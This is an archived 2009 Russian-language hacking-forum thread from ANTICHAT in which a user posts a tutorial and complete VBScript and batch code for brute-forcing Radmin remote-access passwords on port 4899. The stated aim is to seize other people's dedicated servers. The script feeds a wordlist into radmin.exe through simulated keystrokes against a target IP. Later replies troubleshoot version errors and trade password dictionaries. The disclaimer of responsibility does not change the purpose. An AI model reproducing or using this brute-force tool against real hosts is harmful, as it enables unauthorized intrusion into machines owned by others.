ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
брутфорс дедиков через Radmin |
13.05.2009, 22:36
|
|
Участник форума
Регистрация: 02.05.2009
Сообщений: 164
Провел на форуме:
90499
Репутация:
84
|
|
брутфорс дедиков через Radmin
[ {Введение}
Салют всем любителям «холявных» дедиков, и просто нашедшим на атакуймой машине открытый 4899 порт из под радмина посвящается.
{Теория}
Все мы сталкивались с такой ситуацией ,когда насканив радминовский порт ,мы с безумным блеском в глазах вбивая дефолтный пасс , обламывались на говно. А взять себе данный дед, желание так просто и распирает. Что делать??? Все просто пишем свой Брут под данный косяк.
Для начала у нас должен быть алгоритм. Для написания Я выбрал язык программирования VBS script. Что же должен делать наш брутфорс.
Вот простенький алгоритм (Проще думаю уже некуда) :
1.Это принимать IP-адрес атакуемой машины.
2. Находить словарь, и по нему осуществлять подбор
3. Выводить результат.
Ну всё переходим к практике.
{Практика (геморрой)}( Все что приведено тут делается в простом блокноте.)
Что так просто кажется в теории, не так просто сделать на практике. Для начала сделаем сам брут. Так как програмулину на ВБС учить работать с сетью это мутатень, будем использовать программу уже умеющую делать это, а именно Radmin.exe.
Первое что мы сделаем , это создадим бат файл , где укажем какие параметры он должен передать брут скрипту. Исходник батника будет выглядеть так :
Start.bat
Код:
cscript winner13.vbs password.txt
(сохраняем это в файл start.bat)
Тут видим что через батник запускается winner13.vbs с параметром password.txt
Где же сам брутфорс спросите вы ,а вот он:
(из за простоты скрипта, комментарий думаю излишний)
Код:
WScript.Echo " "
WScript.Echo " "
WScript.Echo " "
WScript.Echo " "
WScript.Echo " ==================================================="
WScript.Echo " = Вводим ip атакуемого ="
WScript.Echo " = ="
WScript.Echo " = Используется: cscript winner13.vbs ="
WScript.Echo " = Подбор по словарю = password.txt ="
WScript.Echo " ==================================================="
WScript.Echo " "
WScript.Echo " note: do not interfere with the process !!!! "
WScript.Echo " "
WScript.Echo " "
Set objShell = CreateObject("Wscript.Shell") ' создаём вбс объект
intValue = InputBox("Please Enter Your Target IP:") ' делаем ввод данных по айпишнегу.
strCommandLine = intValue
Set cmd = CreateObject("WScript.Shell")
If WScript.Arguments(0) = "" Then
WScript.Echo "usage: cscript vbsFile.vbs <yourtxtfile>" ' юзаем наш password.TXT
Else
Set fso = CreateObject("Scripting.FileSystemObject")
Filename = WScript.Arguments(0)
If fso.FileExists(Filename) Then ' цикл подбора
Set objTextFile = fso.OpenTextFile(Filename,1) ' открытие словаря
WScript.Sleep 2000
Do Until objTextFile.AtEndOfStream
line = objTextFile.Readline
WScript.Echo "[+] Атакуется " & intValue & "....... " & line ' вывод строки
WScript.Sleep 200
set WshShell = WScript.CreateObject("WScript.Shell") ' начало работы с файлом radmin.exe
WshShell.Run "radmin.exe /connect:" & intValue & ":4899 /telnet" 'запуск
WScript.Sleep 1000 'задержка в секунду
WshShell.AppActivate "Enter password for <Entry name>" 'вывод положительного результат если таковой есть
WshShell.SendKeys line
WScript.Sleep 1000 'задержка в секунду
WshShell.SendKeys "{ENTER}"
WScript.Sleep 1000
WshShell.SendKeys "{ENTER}"
loop
objTextFile.Close 'закрытие словаря
Else
WScript.Echo Filename & "не найденно" ' вывод отрицательного результата
End If
End If
(всё это сохраняем как winner13.vbs)
Ну вот 2 файла у нас готово , это start.bat и winner13.vbs. Теперь нам лишь остается закинуть в папку саму программу radmin.exe, и словарь для атаки password.txt
Итак. Последовательность действий:
1.Выделяем какую нить пустую папочку
2. Создаем там батник start.bat
3.Создаем ВБСскрипт winner13.vbs
4. Кидаем туда же radmin.exe
5. Создаем словарь для атаки password.txt
А дальше всё просто =).Брутим дедик , и наслаждаемся результатом.
{Вывод}
Ну тут как обычно , автор не несёт ответственности за ваши действия , и т.д и т.п. Всё что вы сделаете в этом виноваты вы сами, эта статья лишь для ознакомления. Всем всего доброго. Поверид бай winner13
(с) winner13
P.S. для тех у кого нечего не работает, чуть позже выложу уже готовое. С наилучшими пожеланиями от меня. |
|
|
14.05.2009, 19:49
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Хорош, автору респект. Ша буду тестить...
|
|
|
|
14.05.2009, 21:33
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Вообщем, вопрос следующего характера: А почему при бруте слова со словаря password.txt вставляются в поле username, а не в password?
P.S. Еще вопрос немного оффтопик: Какой логин:пасс у радмина по-умолчанию?
Последний раз редактировалось nemaniak; 14.05.2009 в 21:41..
|
|
|
|
14.05.2009, 21:44
|
|
Участник форума
Регистрация: 02.05.2009
Сообщений: 164
Провел на форуме:
90499
Репутация:
84
|
|
Сообщение от nemaniak
Вообщем, вопрос следующего характера: А почему при бруте слова со словаря password.txt вставляются в поле username, а не в password?
скорей всего ты что то не так собрал, либо несовместимый радмин ,нет тех фитч,что на той версии которую использовал Я .Сейчас выложу готовое.
|
|
|
|
14.05.2009, 22:38
|
|
Участник форума
Регистрация: 02.05.2009
Сообщений: 164
Провел на форуме:
90499
Репутация:
84
|
|
|
|
|
|
14.05.2009, 23:13
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
проверим
кто тестил, отпишитесь
|
|
|
|
14.05.2009, 23:40
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Скачал твою рабочую версию, сейчас пишет
Incorrect version of server
Какова версия твоего radmin'a? Судя по всему вторая, значит дедики с версией 3 радмин сервера брутить не получится?
|
|
|
|
14.05.2009, 23:44
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
киньте у кого есть норм словарь
|
|
|
|
15.05.2009, 01:39
|
|
Участник форума
Регистрация: 02.05.2009
Сообщений: 164
Провел на форуме:
90499
Репутация:
84
|
|
Сообщение от nemaniak
Скачал твою рабочую версию, сейчас пишет
Incorrect version of server
Какова версия твоего radmin'a? Судя по всему вторая, значит дедики с версией 3 радмин сервера брутить не получится?
Просто кинь ехе-шник радмина ,3 версии в папку и всё будет гуд.просто Когда писал это, ещё 2радмин новой версией был.Всё норм работает =)
А словари через гугл , там линков много.Сюда кину что нормальное найду.
|
|
|
|
15.05.2009, 20:33
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
вот словарь для брута(пособирал на ачате)
Последний раз редактировалось navigat0r; 15.05.2009 в 20:36..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
